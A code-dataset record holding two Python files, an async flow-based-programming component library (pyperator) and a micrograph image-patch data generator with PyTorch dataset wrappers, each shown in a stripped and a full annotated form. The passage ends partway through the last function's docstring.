8a58b8624f19ba243cc918e2073ff83514cb5c53 | 12,589 | py | Python | pyperator/components.py | baffelli/pyperator | 4b4d176db993708dc1f7d8cec048d490910213b7 | [
"MIT"
] | 60 | 2017-03-18T10:01:16.000Z | 2021-12-07T02:55:43.000Z | pyperator/components.py | baffelli/pyperator | 4b4d176db993708dc1f7d8cec048d490910213b7 | [
"MIT"
] | 14 | 2017-04-11T06:10:02.000Z | 2018-03-16T12:40:20.000Z | pyperator/components.py | baffelli/pyperator | 4b4d176db993708dc1f7d8cec048d490910213b7 | [
"MIT"
] | 8 | 2017-11-01T11:33:34.000Z | 2019-12-01T22:58:38.000Z | import asyncio
import glob as _glob
import itertools as _iter
import pathlib as _path
import random as _rand
import functools
from pyperator import IP
from pyperator.nodes import Component
from pyperator.utils import InputPort, OutputPort, FilePort
from pyperator.decorators import log_schedule, component, inport, outport
class GeneratorSource(Component):
"""
This is a component that returns a single element from a generator
passed at initalization time to 'gen'
to a single output 'OUT'
"""
@log_schedule
class FormatString(Component):
"""
This component formats
a string "{}" given on
the port "pattern"
the values of the input packets
and sends it to "OUT"
"""
class GlobSource(Component):
"""
This is a component that emits Packets
according to a glob pattern specified
when the component is initialized
"""
@log_schedule
class Product(Component):
"""
This component generates the
cartesian product of the packets incoming from each ports and
then sends them to the output port `OUT` as bracket IPs.
Alternatively, by providing a function `fun` to the constructor, another
combinatorial function can be used to generate the packets.
"""
@log_schedule
class FileListSource(Component):
"""
This is a component that emits InformationPackets
from a list of files
"""
@log_schedule
class ReplacePath(Component):
"""
This is a component that emits InformationPackets
with a path obtained by replacing the input path
"""
@log_schedule
class Split(Component):
"""
This component splits the input tuple into
separate ouputs; the number of elements is given
with `n_outs`
"""
@log_schedule
# class IterSource(Component):
# """
# This component returns a Bracket IP
# from a itertool function such as product
# """
#
# def __init__(self, name, *generators, function=_iter.combinations):
# super(IterSource, self).__init__(name)
# self.generators = generators
# self.outputs.add(OutputPort('OUT'))
# self.function = function
#
# @log_schedule
# async def __call__(self):
# for items in self.function(*self.generators):
# open = IP.OpenBracket()
# await self.outputs.OUT.send_packet(open)
# for item in items:
# packet = IP.InformationPacket(item)
# await self.outputs.OUT.send_packet(packet)
# await self.outputs.OUT.send_packet(IP.CloseBracket())
# await asyncio.sleep(0)
# await self.close_downstream()
class ConstantSource(Component):
"""
This is a component that continously outputs a constant to
the output 'OUT', up to to :repeat: times, infinitely if :repeat: is none
The constant is given to the 'constant' port
"""
@log_schedule
class Repeat(Component):
"""
This component receives
from his input once only
and keeps on repeating
it on the output
"""
class Filter(Component):
"""
This component filters the input in 'IN' according to the given predicate in the port 'predicate'
and sends it to the output 'OUT' if the predicate is true
"""
@log_schedule
class BroadcastApplyFunction(Component):
"""
This component computes a function of the inputs
and sends it to all outputs
"""
@log_schedule
class OneOffProcess(BroadcastApplyFunction):
"""
This class awaits the upstream process once and then keeps on
broadcasting the result to the outputs
"""
@log_schedule
@outport('OUT')
@inport('IN')
@component
async def Once(self):
"""
This component
receives from `IN` once and sends
the result to `OUT`. Afterwards, it closes
:param self:
:return:
"""
in_packet = await self.inputs.IN.receive_packet()
await self.outputs.OUT.send_packet(in_packet.copy())
self.inputs.IN.close()
@inport("IN")#: inputs :
@outport("OUT")
@component
async def Repeat(self):
"""
This component receives from `IN` once
and repeats it to `OUT` forever
:param self:
:return:
"""
in_packet= await self.inputs.IN.receive_packet()
async with self.outputs.OUT as out:
while True:
await out.send_packet(in_packet.copy())
await asyncio.sleep(0)
@inport('IN')
@outport('count')
@inport('reset', optional=True)
@component
async def Count(self):
"""
This component receives packets from `IN`
and keeps a count that will be continously
sent to `count`
:param self:
:return:
"""
count = 0
reset = False
async with self.outputs.count as out:
while True:
pack = await self.inputs.IN.receive_packet()
count += 1
reset = await self.inputs.reset.receive()
if reset:
count = 0
await self.outputs.count.send(count)
await asyncio.sleep(0)
@outport('OUT')
@component
async def WaitRandom(self):
"""
This component randomly sends
an empty packets after having waited for
a random amount of time
:param self:
:return:
"""
async with self.outputs.OUT as out:
while True:
waiting_time = _rand.uniform(0,3)
self.log.debug('Will wait for {} '.format(waiting_time))
await asyncio.sleep(waiting_time)
await self.outputs.OUT.send(True)
await asyncio.sleep(0) | 30.408213 | 110 | 0.614902 | import asyncio
import glob as _glob
import itertools as _iter
import pathlib as _path
import random as _rand
import functools
from pyperator import IP
from pyperator.nodes import Component
from pyperator.utils import InputPort, OutputPort, FilePort
from pyperator.decorators import log_schedule, component, inport, outport
class GeneratorSource(Component):
    """
    Source component that emits every element of a generator.

    The generator object is received on the input port 'gen' (not at
    initialisation time, despite the original note) and each element is
    broadcast to all output ports, including 'OUT'.
    """
    def __init__(self, name):
        # name: unique component name used by the underlying network
        super(GeneratorSource, self).__init__(name)
        self.outputs.add(OutputPort('OUT'))
        self.inputs.add(InputPort('gen'))
    @log_schedule
    async def __call__(self):
        # Wait for the generator object itself to arrive on 'gen'.
        gen = await self.inputs.gen.receive()
        # Exiting the async context closes 'OUT', signalling downstream
        # components that the stream is exhausted.
        async with self.outputs.OUT:
            for g in gen:
                # send_to_all presumably returns one awaitable per output
                # port -- TODO confirm against Component.send_to_all
                await asyncio.wait(self.send_to_all(g))
                # await asyncio.sleep(0)
class FormatString(Component):
    """
    Formats a pattern string (received once on the port 'pattern') with
    the values of the packets arriving on all other input ports, and
    sends the formatted string to 'OUT'.
    """
    def __init__(self, name):
        super(FormatString, self).__init__(name)
        self.inputs.add(InputPort('pattern'))
        self.outputs.add(OutputPort('OUT'))
    # NOTE(review): unlike sibling components, __call__ is not decorated
    # with @log_schedule -- confirm whether that is intentional.
    async def __call__(self):
        # The format pattern is read a single time, before the main loop.
        pattern = await self.inputs.pattern.receive()
        while True:
            # One packet per connected input port, keyed by port name.
            packets = await self.inputs.receive_packets()
            out_string = pattern.format(**{name:p.value for name,p in packets.items()})
            await self.outputs.OUT.send(out_string)
            # Yield control to the event loop between iterations.
            await asyncio.sleep(0)
class GlobSource(Component):
    """
    Source component that emits one InformationPacket (wrapping a
    pathlib.Path) per file matching a glob pattern received on the
    'pattern' input port, then closes the downstream connections.
    """
    def __init__(self, name):
        super(GlobSource, self).__init__(name)
        self.outputs.add(OutputPort('OUT'))
        self.inputs.add(InputPort('pattern'))
    @log_schedule
    async def __call__(self):
        pattern = await self.inputs.pattern.receive()
        files = _glob.glob(pattern)
        start_message = "using glob pattern {} will emit {} files: {}".format(pattern, len(files), files)
        # NOTE(review): this method uses both ``self.log`` (here) and
        # ``self._log`` (below); one of the two attribute names is likely
        # wrong -- confirm which logger attribute Component provides.
        self.log.info(start_message)
        for file in files:
            # Wrap each path so downstream components can track ownership.
            p = IP.InformationPacket(_path.Path(file), owner=self)
            await self.outputs.OUT.send_packet(p)
            await asyncio.sleep(0)
        stop_message = "exahusted list of files"
        self._log.info(stop_message)
        # Signal downstream components that no more packets will arrive.
        await self.close_downstream()
class Product(Component):
    """
    Generates the cartesian product (or any other combinatorial function
    supplied via ``fun``) of the packets received on each input port and
    sends every combination to 'OUT' as a bracketed substream
    (OpenBracket, packets..., CloseBracket).
    """
    def __init__(self, name, fun=lambda packets: _iter.product(*packets)):
        # fun: callable taking an iterable of per-port packet lists and
        # yielding tuples of packets (defaults to itertools.product).
        super().__init__(name)
        self._fun = fun
        self.outputs.add(OutputPort('OUT'))
    @log_schedule
    async def __call__(self):
        # Drain every input port completely, grouping packets by port.
        all_packets = {k: [] for k in self.inputs.keys()}
        async for packet_dict in self.inputs:
            for port, packet in packet_dict.items():
                all_packets[port].append(packet)
        async with self.outputs.OUT:
            for it, p in enumerate(self._fun(all_packets.values())):
                # Each combination becomes one bracketed substream; the
                # packets are copied so each combination owns its data.
                substream = [IP.OpenBracket()] + [p1.copy() for p1 in p] + [IP.CloseBracket()]
                # Send packets in substream
                for p1 in substream:
                    await self.outputs.OUT.send_packet(p1)
                await asyncio.sleep(0)
class FileListSource(Component):
    """
    Source component that wraps every entry of a fixed file list in an
    InformationPacket and emits it on the file port 'OUT', then tells
    downstream components to shut down.
    """
    def __init__(self, name, files):
        super(FileListSource, self).__init__(name)
        self.files = files
        self.outputs.add(FilePort('OUT'))
    @log_schedule
    async def __call__(self):
        out_port = self.outputs.OUT
        for current_file in self.files:
            packet = IP.InformationPacket(current_file, owner=self)
            await out_port.send_packet(packet)
            # Yield control to the scheduler between packets.
            await asyncio.sleep(0)
        # File list exhausted: propagate the shutdown signal.
        await self.close_downstream()
class ReplacePath(Component):
    """
    For every packet received on 'IN', emits on 'OUT' a new
    InformationPacket whose path has an (old, new) string replacement
    applied.

    The replacement pair is read once from the 'pattern' input port.
    The constructor argument of the same name is now stored as an
    attribute (previously it was silently dropped).
    """
    def __init__(self, name, pattern):
        super(ReplacePath, self).__init__(name)
        # Bug fix: keep the constructor argument; __call__ previously
        # referenced the never-assigned ``self.pattern`` and would have
        # raised AttributeError.
        self.pattern = pattern
        self.inputs.add(InputPort('IN'))
        self.inputs.add(InputPort('pattern'))
        self.outputs.add(OutputPort('OUT'))
    @log_schedule
    async def __call__(self):
        # Receive the (old, new) replacement pair once, up front.
        pattern = await self.inputs.pattern.receive()
        while True:
            p = await self.inputs.IN.receive_packet()
            # Bug fix: use the pattern received on the port instead of the
            # previously undefined ``self.pattern`` lookup.
            p1 = IP.InformationPacket(p.path.replace(*pattern), owner=self)
            # Release the incoming packet once its path has been consumed.
            p.drop()
            await self.outputs.OUT.send_packet(p1)
            await asyncio.sleep(0)
class Split(Component):
    """
    Collects the packets of each bracketed substream arriving on 'IN'
    and distributes them element-wise across this component's output
    ports (first element to the first port, and so on).
    """
    def __init__(self, name):
        super(Split, self).__init__(name)
        self.inputs.add(InputPort('IN'))
    @log_schedule
    async def __call__(self):
        # Iterate over the input stream; assumes a well-formed bracketed
        # stream -- ``data`` is only initialised when an OpenBracket is
        # seen, so a stray data packet before the first bracket would
        # raise NameError. TODO confirm the upstream protocol guarantees.
        async for packet in self.inputs.IN:
            if isinstance(packet, IP.OpenBracket):
                packet.drop()
                data = []
            elif isinstance(packet, IP.CloseBracket):
                packet.drop()
                self._log.debug(
                    "Splitting '{}'".format(data))
                # zip truncates: extra elements beyond the number of
                # output ports are silently discarded.
                for (output_port_name, output_port), out_packet in zip(self.outputs.items(), data):
                    await output_port.send_packet(out_packet.copy())
            else:
                data.append(packet)
                await asyncio.sleep(0)
            await asyncio.sleep(0)
# class IterSource(Component):
# """
# This component returns a Bracket IP
# from a itertool function such as product
# """
#
# def __init__(self, name, *generators, function=_iter.combinations):
# super(IterSource, self).__init__(name)
# self.generators = generators
# self.outputs.add(OutputPort('OUT'))
# self.function = function
#
# @log_schedule
# async def __call__(self):
# for items in self.function(*self.generators):
# open = IP.OpenBracket()
# await self.outputs.OUT.send_packet(open)
# for item in items:
# packet = IP.InformationPacket(item)
# await self.outputs.OUT.send_packet(packet)
# await self.outputs.OUT.send_packet(IP.CloseBracket())
# await asyncio.sleep(0)
# await self.close_downstream()
class ConstantSource(Component):
    """
    Continuously broadcasts a constant, up to ``repeat`` times, or
    forever when ``repeat`` is falsy (e.g. None or 0).

    The constant value and the repeat count are received on the
    'constant' and 'repeat' input ports; results go to every output
    port, including 'OUT'.
    """
    def __init__(self, name):
        super(ConstantSource, self).__init__(name)
        self.outputs.add(OutputPort('OUT'))
        # Bug fix: 'constant' and 'repeat' are read from self.inputs in
        # __call__, but were previously registered on self.outputs.
        self.inputs.add(InputPort('constant'))
        self.inputs.add(InputPort('repeat'))
    @log_schedule
    async def __call__(self):
        repeat = await self.inputs.repeat.receive()
        constant = await self.inputs.constant.receive()
        for i in _iter.count():
            # A falsy repeat count means "emit forever".
            if repeat and i >= repeat:
                return
            await asyncio.wait(self.send_to_all(constant))
            # Yield control to the event loop between emissions.
            await asyncio.sleep(0)
class Repeat(Component):
    """
    Receives a single packet from 'IN', closes the input, and then
    repeats copies of that packet on 'OUT' forever.
    """
    def __init__(self, name):
        super(Repeat, self).__init__(name)
        self.inputs.add(InputPort('IN'))
        self.outputs.add(OutputPort('OUT'))
    async def __call__(self):
        packet = await self.inputs.IN.receive_packet()
        # Only one packet is ever needed; release the input port.
        self.inputs.IN.close()
        # Bug fixes: output ports are used as *async* context managers
        # elsewhere in this module and send_packet is a coroutine, so
        # both must be awaited; the loop also yields to the event loop
        # each iteration so it cannot starve other components.
        async with self.outputs.OUT:
            while True:
                await self.outputs.OUT.send_packet(packet.copy())
                await asyncio.sleep(0)
class Filter(Component):
    """
    Forwards values from 'IN' to 'OUT' only when the predicate received
    on the 'predicate' port evaluates to a truthy result.
    """
    def __init__(self, name):
        super(Filter, self).__init__(name)
        self.inputs.add(InputPort('IN'))
        self.inputs.add(InputPort('predicate'))
        self.outputs.add(OutputPort('OUT'))
    @log_schedule
    async def __call__(self):
        # Bug fix: receive() is a coroutine; without the await,
        # ``predicate`` would be a coroutine object and calling it below
        # would raise TypeError.
        predicate = await self.inputs.predicate.receive()
        while True:
            # Bug fix: the port lives on ``self.inputs``; ``self.IN``
            # does not exist on Component.
            data = await self.inputs.IN.receive()
            filter_result = predicate(data)
            # If the predicate is true, the data is sent
            if filter_result:
                await self.outputs.OUT.send(data)
            else:
                await asyncio.sleep(0)
            await asyncio.sleep(0)
class BroadcastApplyFunction(Component):
    """
    Repeatedly receives one value per input port, applies ``function``
    to them as keyword arguments, and broadcasts the result to every
    output port.
    """
    def __init__(self, name, function):
        # function: callable invoked as function(**{port_name: value})
        super(BroadcastApplyFunction, self).__init__(name)
        self.function = function
    @log_schedule
    async def __call__(self):
        while True:
            data = await self.receive()
            transformed = self.function(**data)
            # NOTE(review): send_to_all is awaited elsewhere in this
            # module (via asyncio.wait); here its result is discarded --
            # confirm whether the sends actually complete.
            self.send_to_all(transformed)
            await asyncio.sleep(0)
class OneOffProcess(BroadcastApplyFunction):
    """
    Awaits the upstream data once, then repeatedly applies ``function``
    and broadcasts the result to the outputs.
    """
    def __init__(self, name, function):
        super(OneOffProcess, self).__init__(name, function)
    @log_schedule
    async def __call__(self):
        # wait once for the data
        data = await self.receive()
        while True:
            # NOTE(review): the result is fed back as the next ``data``
            # and unpacked with **, so ``function`` must return a mapping
            # of port-name keyword arguments -- confirm this contract.
            transformed = self.function(**data)
            data = transformed
            await asyncio.wait(self.send_to_all(data))
            await asyncio.sleep(0)
class ShowInputs(Component):
    """
    Debugging sink: repeatedly receives one packet per input port and
    logs/prints their string representations.
    """
    def __init__(self, name):
        super(ShowInputs, self).__init__(name)
    @log_schedule
    async def __call__(self):
        while True:
            packets = await self.receive_packets()
            show_str = "Component {} saw:\n".format(self.name) + "\n".join([str(p) for p in packets.values()])
            self._log.debug(show_str)
            # Also echo to stdout for interactive runs.
            print(show_str)
@outport('OUT')
@inport('IN')
@component
async def Once(self):
    """
    Receives a single packet from `IN`, forwards a copy of it to `OUT`,
    then closes the input port.
    :param self:
    :return:
    """
    in_packet = await self.inputs.IN.receive_packet()
    # A copy is sent so the original packet's ownership is not transferred.
    await self.outputs.OUT.send_packet(in_packet.copy())
    self.inputs.IN.close()
@inport("IN")  # single input port
@outport("OUT")
@component
async def Repeat(self):
    """
    Receives one packet from `IN` and repeats copies of it on `OUT`
    forever.

    NOTE(review): this function shadows the ``Repeat`` class defined
    earlier in this module -- the later definition wins at import time.
    Confirm which of the two is intended to be public.
    :param self:
    :return:
    """
    in_packet= await self.inputs.IN.receive_packet()
    async with self.outputs.OUT as out:
        while True:
            await out.send_packet(in_packet.copy())
            await asyncio.sleep(0)
@inport('IN')
@outport('count')
@inport('reset', optional=True)
@component
async def Count(self):
    """
    Receives packets from `IN` and continuously sends the running count
    to `count`; a truthy value on the optional `reset` port zeroes it.
    :param self:
    :return:
    """
    count = 0
    reset = False
    async with self.outputs.count as out:
        # NOTE(review): ``out`` is bound but the full port path is used
        # below, and ``pack`` is received but never used or dropped.
        while True:
            pack = await self.inputs.IN.receive_packet()
            count += 1
            # NOTE(review): awaiting an *optional* port; if 'reset' is
            # left unconnected this may block forever -- confirm how
            # optional ports behave when unconnected.
            reset = await self.inputs.reset.receive()
            if reset:
                count = 0
            await self.outputs.count.send(count)
            await asyncio.sleep(0)
@outport('OUT')
@component
async def WaitRandom(self):
    """
    Repeatedly sends ``True`` on `OUT` after waiting a uniformly random
    0-3 second delay.
    :param self:
    :return:
    """
    async with self.outputs.OUT as out:
        # NOTE(review): ``out`` is bound but unused; also ``self.log`` is
        # used here while other components use ``self._log`` -- confirm
        # the correct logger attribute on Component.
        while True:
            waiting_time = _rand.uniform(0,3)
            self.log.debug('Will wait for {} '.format(waiting_time))
            await asyncio.sleep(waiting_time)
            await self.outputs.OUT.send(True)
            await asyncio.sleep(0)
2d668f7d5d669b88f263c0a3f968ec638e5cf693 | 13,224 | py | Python | utils.py | sabernn/vit-pytorch | 21a2671aa92adb941a56ae629f6089f550949fb2 | [
"MIT"
] | null | null | null | utils.py | sabernn/vit-pytorch | 21a2671aa92adb941a56ae629f6089f550949fb2 | [
"MIT"
] | null | null | null | utils.py | sabernn/vit-pytorch | 21a2671aa92adb941a56ae629f6089f550949fb2 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from skimage.io import imread, imshow
import matplotlib.pyplot as plt
import random
import numpy as np
import matplotlib.patches as patches
import os
from torch.utils.data import Dataset, DataLoader
import torch
import glob
if __name__ == "__main__":
from configs import InputParser
dataset = DataGeneratorTorch()
data_loader = DataLoader(dataset, batch_size=4, shuffle=True)
args = InputParser()
data = DataGenerator(args)
training_data_single = data.input_data('cracks','train',plot=False)
training_data_all = data.label_maker()
dataTorch = data.toTorchDataset(is_train=True)
data_loader_lmd = DataLoader(dataTorch, batch_size=4, shuffle=True)
print("Done")
| 35.934783 | 143 | 0.588627 | from abc import ABC, abstractmethod
from skimage.io import imread, imshow
import matplotlib.pyplot as plt
import random
import numpy as np
import matplotlib.patches as patches
import os
from torch.utils.data import Dataset, DataLoader
import torch
import glob
class DataGeneratorBase(ABC):
    """Abstract base class defining the standardized input-data interface."""
    @abstractmethod
    def __init__(self,args):
        '''
        Coming up with a standardized input data format.
        :param args: contains network parameters including the name of the image dataset (e.g. aps, zeiss, northstar, etc.)
        '''
        # Subclasses must call this to record the dataset name.
        self.dataset=args['dataset']
    @abstractmethod
    def input_data(self):
        '''
        :return X: a 4D numpy array containing the image patches and the corresponding color code of each pixel
        :return Y: a 4D numpy array containing the image patches and the corresponding label of each pixel
        X dimension: (number of samples)x(image height)x(image width)x(number of channels)
        Y dimension: (number of samples)x(image height)x(image width)x(1)
        '''
        pass
class DataGenerator(DataGeneratorBase):
    """
    Data generator for micrograph images stored on disk.

    Expects the layout ``resources/<dataset>/{train,test}/<category>``
    where category is one of 'original', 'pores', 'cracks'. Produces
    (patch, mask) pairs via :meth:`input_data` or (patch, label) pairs
    via :meth:`label_maker`.
    """
    def __init__(self, args):
        super().__init__(args)
        self.ROOT_DIR = os.path.abspath("")  # directory of main.py
        self.TRAIN_DIR = os.path.join(self.ROOT_DIR, 'resources', self.dataset, 'train')
        self.TEST_DIR = os.path.join(self.ROOT_DIR, 'resources', self.dataset, 'test')
        self.categories = ["original", "pores", "cracks"]
        self.CAT_TRAIN_DIRS = [""] * len(self.categories)
        self.CAT_TEST_DIRS = [""] * len(self.categories)
        for i, c in enumerate(self.categories):
            self.CAT_TRAIN_DIRS[i] = os.path.join(self.TRAIN_DIR, c)
            # Bug fix: the test directories were previously built from
            # TRAIN_DIR, so "test" data silently came from the train set.
            self.CAT_TEST_DIRS[i] = os.path.join(self.TEST_DIR, c)
        # Read the image dimensions once instead of twice.
        self.IMG_HEIGHT, self.IMG_WIDTH = self.get_image_dims()
        self.rnd_seed = args['rnd_seed']
        self.args = args
    def show_data(self, stage='train'):
        """Print the image count and display one image per category."""
        titles = list(map(lambda x: x.capitalize(), self.categories))
        # NOTE(review): always reads TRAIN_DIR regardless of ``stage`` --
        # confirm whether test-stage display should use TEST_DIR.
        path_orig = os.path.join(self.TRAIN_DIR, self.categories[0])
        imgcode = next(os.walk(path_orig))[2][0]
        print("$$$$$$$$$$$$")
        print("$$$ NOTE $$$: You have {0} images for {1} stage.".format(len(next(os.walk(path_orig))[2]), stage))
        print("$$$$$$$$$$$$")
        n_categories = len(self.categories)
        for i, c in enumerate(self.categories):
            plt.subplot(1, n_categories, i + 1)
            plt.title(titles[i])
            plt.xlabel("X")
            plt.ylabel("Y")
            temp_path = os.path.join(self.TRAIN_DIR, c, imgcode)
            # skimage.io.imshow accepts a file name directly; a redundant
            # imread of the same file was removed here.
            imshow(temp_path)
        plt.show()
    def get_image_dims(self):
        """Return (height, width) of the first training 'original' image."""
        imgcode = next(os.walk(self.CAT_TRAIN_DIRS[0]))[2][0]
        path_img = os.path.join(self.CAT_TRAIN_DIRS[0], imgcode)
        origimg = imread(path_img)
        height = origimg.shape[0]  # number of rows
        width = origimg.shape[1]   # number of columns
        return height, width
    def input_data(self, fault, stage='train', n_patches=100, patch_size=32,
                   aug_mode='regular', plot=True):
        """
        Extract image patches that contain the given fault.

        :param fault: one of self.categories (e.g. 'pores', 'cracks')
        :param stage: 'train' or 'test'
        :param n_patches: number of random patches ('random_patches' mode)
        :param patch_size: square patch side length in pixels
        :param aug_mode: 'regular' (tiling) or 'random_patches'
        :param plot: draw the selected patch rectangles on the fault image
        :return: (X, Y, count, L) -- patches, boolean masks, the number of
            patches actually kept, and a per-patch list of fault labels
        """
        super().input_data()
        try:
            ind = self.categories.index(fault)
        except ValueError:
            # Narrowed from a bare ``except:`` -- .index only raises ValueError.
            raise ValueError("Saber: '{0}' is not among the specified categories in your data model!".format(fault))
        count = 0
        IMG_CHANNELS = 1  # to be revised later
        if stage == 'train':
            random.seed(self.rnd_seed)
            imgcode = next(os.walk(self.CAT_TRAIN_DIRS[ind]))[2][0]
            oimage = imread(os.path.join(self.CAT_TRAIN_DIRS[0], imgcode))
            fimage = imread(os.path.join(self.CAT_TRAIN_DIRS[ind], imgcode))
        elif stage == 'test':
            # Different seed so test patches differ from train patches.
            random.seed(self.rnd_seed + 1)
            imgcode = next(os.walk(self.CAT_TEST_DIRS[ind]))[2][0]
            oimage = imread(os.path.join(self.CAT_TEST_DIRS[0], imgcode))
            fimage = imread(os.path.join(self.CAT_TEST_DIRS[ind], imgcode))
        else:
            raise ValueError("Saber: 'stage' is not defined!")
        ### CONSIDER OTHER METHODS: Otsu's, Gaussian Mixture
        image_thr = thresholder(fimage, 254)
        if plot:
            fig, ax = plt.subplots(1)
            ax.imshow(fimage, cmap='gray', vmin=0, vmax=255)
        if aug_mode == 'random_patches':
            X = np.zeros((n_patches, patch_size, patch_size, IMG_CHANNELS), dtype=np.uint8)
            # Bug fix: the ``np.bool`` alias was removed in NumPy 1.24;
            # the builtin ``bool`` maps to ``np.bool_``.
            Y = np.zeros((n_patches, patch_size, patch_size, 1), dtype=bool)
            L = [None] * n_patches
            while count < n_patches:
                upperleft_x = random.choice(range(self.IMG_HEIGHT - patch_size))
                upperleft_y = random.choice(range(self.IMG_WIDTH - patch_size))
                img = oimage[upperleft_x:upperleft_x + patch_size, upperleft_y:upperleft_y + patch_size]
                img2 = image_thr[upperleft_x:upperleft_x + patch_size, upperleft_y:upperleft_y + patch_size]
                img = np.expand_dims(img, axis=-1)
                img2 = np.expand_dims(img2, axis=-1)
                # Keep only patches whose mask contains fault pixels.
                if np.max(img2) > 0:
                    X[count] = img
                    Y[count] = img2
                    L[count] = fault
                    count += 1
                    if plot:
                        rect = patches.Rectangle((upperleft_y, upperleft_x), patch_size, patch_size, linewidth=1,
                                                 edgecolor='w', facecolor="none")
                        ax.add_patch(rect)
        elif aug_mode == 'regular':
            max_patches = int(self.IMG_HEIGHT / patch_size) * int(self.IMG_WIDTH / patch_size)
            X = np.zeros((max_patches, patch_size, patch_size, IMG_CHANNELS), dtype=np.uint8)
            Y = np.zeros((max_patches, patch_size, patch_size, 1), dtype=bool)
            L = [None] * max_patches
            print(max_patches)
            for i in range(0, self.IMG_HEIGHT - patch_size, patch_size):
                for j in range(0, self.IMG_WIDTH - patch_size, patch_size):
                    # NOTE(review): x is taken from j and y from i here,
                    # the opposite of the random branch -- confirm intent.
                    upperleft_x = j
                    upperleft_y = i
                    img = oimage[upperleft_x:upperleft_x + patch_size, upperleft_y:upperleft_y + patch_size]
                    img2 = image_thr[upperleft_x:upperleft_x + patch_size, upperleft_y:upperleft_y + patch_size]
                    img = np.expand_dims(img, axis=-1)
                    img2 = np.expand_dims(img2, axis=-1)
                    if np.max(img2) > 0:
                        X[count] = img
                        Y[count] = img2
                        L[count] = fault
                        count += 1
                        if plot:
                            rect = patches.Rectangle((upperleft_y, upperleft_x), patch_size, patch_size, linewidth=1,
                                                     edgecolor='w', facecolor="none")
                            ax.add_patch(rect)
        else:
            # Robustness fix: previously an unknown aug_mode fell through
            # to an opaque NameError on X below.
            raise ValueError("Saber: unknown aug_mode '{0}'!".format(aug_mode))
        # Trim the pre-allocated arrays down to the patches actually kept.
        X = X[:count]
        Y = Y[:count]
        L = L[:count]
        print("Count: " + str(count))
        if plot:
            plt.title("Selected patches for " + stage.capitalize())
            plt.show()
        return X, Y, count, L
    def label_maker(self, stage='train', n_patches=100, patch_size=32, aug_mode='regular'):
        """Return a list of [patch, fault_label] pairs over all fault categories."""
        n_faults = len(self.categories) - 1  # excluding the original image
        labeled_data = []
        for i in range(n_faults):
            imgs, _, _, L = self.input_data(
                self.categories[i + 1], stage=stage, n_patches=n_patches,
                patch_size=patch_size, aug_mode=aug_mode, plot=False)
            # Robustness fix: skip categories that yielded no patches
            # instead of raising IndexError on L[0].
            if not L:
                continue
            lbl = L[0]
            for img in imgs:
                labeled_data.append([img, lbl])
        return labeled_data
    def toTorchDataset(self, is_train):
        """Wrap this generator in a torch ``Dataset`` adapter."""
        return DataGeneratorTorchFromLamda(self, is_train)
class DataGeneratorTorchFromLamda(Dataset):
    """Torch Dataset adapter over a :class:`DataGenerator` instance."""
    def __init__(self,lamda_dataset: DataGenerator, is_train) -> None:
        # Remember the stage directory (currently only informational).
        if is_train:
            self.imgs_path = lamda_dataset.TRAIN_DIR
        else:
            self.imgs_path = lamda_dataset.TEST_DIR
        # NOTE(review): label_maker() defaults to stage='train', so the
        # ``is_train`` flag does not change which data is loaded --
        # confirm whether label_maker(stage=...) should be passed here.
        self.data = lamda_dataset.label_maker()
        # Map each fault category (skipping 'original') to an integer id.
        self.class_map = {}
        for i,keys in enumerate(lamda_dataset.categories[1:]):
            self.class_map[keys] = i
        self.img_dim = (lamda_dataset.args['patch_size'],lamda_dataset.args['patch_size'])
    def __len__(self):
        return len(self.data)
    def __getitem__(self, index):
        # Patches are stored as (H, W, C) uint8 arrays; convert to a
        # float CHW tensor as expected by torch image models.
        img, class_name = self.data[index]
        class_id = self.class_map[class_name]
        img_tensor = torch.from_numpy(img).float()
        img_tensor = img_tensor.permute(2, 0, 1)
        # squeeze(-1) yields a scalar label tensor.
        class_id = torch.tensor([class_id]).squeeze(-1)
        return img_tensor, class_id
class DataGeneratorTorch(Dataset):
    """
    Torch Dataset that globs ``<DIR>/<class>/*.tiff`` image files and
    yields (image tensor, class id) pairs, reading each image lazily.
    """
    def __init__(self,DIR="resources/zeiss/train/") -> None:
        self.imgs_path = DIR
        file_list = glob.glob(self.imgs_path + "*")
        print(file_list)
        self.data = []
        for class_path in file_list:
            # NOTE(review): splitting on "\\" assumes Windows-style
            # paths; on POSIX the class name extraction would fail.
            class_name = class_path.split("\\")[-1]
            for img_path in glob.glob(class_path + "/*.tiff"):
                self.data.append([img_path, class_name])
        print(self.data)
        # Fixed class-name -> id mapping for this dataset layout.
        self.class_map = {"orig" : 0, "pores": 1, "cracks": 2}
        self.img_dim = (2000,2000)
    def __len__(self):
        return len(self.data)
    def __getitem__(self, index):
        img_path, class_name = self.data[index]
        img = imread(img_path)
        class_id = self.class_map[class_name]
        img_tensor = torch.from_numpy(img)
        # Label is returned with shape (1,), not squeezed to a scalar.
        class_id = torch.tensor([class_id])
        return img_tensor, class_id
def show_data(dataset='zeiss', stage='train', plot=True):
    """
    Print the number of images available for *stage* and optionally
    display the 'original', 'pores' and 'cracks' images side by side.

    :param dataset: dataset folder name under ``resources``
    :param stage: 'train' or 'test' sub-folder
    :param plot: when True, show the three category images
    :return: (n_rows, n_cols) of the first 'pores' image. Callers have
        historically unpacked this as (width, height); the returned
        values and their order are unchanged -- only the misleading
        local names were fixed.
    """
    # original, pores, cracks
    ROOT_DIR = os.path.abspath("")
    path_stage = os.path.join(ROOT_DIR, 'resources', dataset, stage)
    categories = ["original", "pores", "cracks"]
    titles = ["Original", "Pores", "Cracks"]
    category = categories[1]
    path_cat = os.path.join(path_stage, category)
    imgcode = next(os.walk(path_cat))[2][0]
    print("$$$$$$$$$$$$")
    print("$$$ NOTE $$$: You have {0} images for {1} stage.".format(len(next(os.walk(path_cat))[2]), stage))
    print("$$$$$$$$$$$$")
    path_img = os.path.join(path_cat, imgcode)
    origimg = imread(path_img)
    if plot:  # idiom fix: was ``plot == True``
        for i, c in enumerate(categories):
            plt.subplot(1, 3, i + 1)
            plt.title(titles[i])
            plt.xlabel("X")
            plt.ylabel("Y")
            temp_path = os.path.join(path_stage, c, imgcode)
            # skimage.io.imshow accepts a file name directly; a redundant
            # imread of the same file was removed here.
            imshow(temp_path)
        plt.show()
    # shape[0] is the number of rows (height); the old names were swapped.
    n_rows = origimg.shape[0]
    n_cols = origimg.shape[1]
    return n_rows, n_cols
def thresholder(orig_image, margin):
    """Return a copy of *orig_image* with every pixel below *margin* zeroed."""
    result = orig_image.copy()
    below_margin = result < margin
    result[below_margin] = 0
    return result
def cumulative_loss(loss):
    """
    Return the running (cumulative) sum of a sequence of loss values.

    :param loss: sequence of numbers (e.g. per-epoch losses)
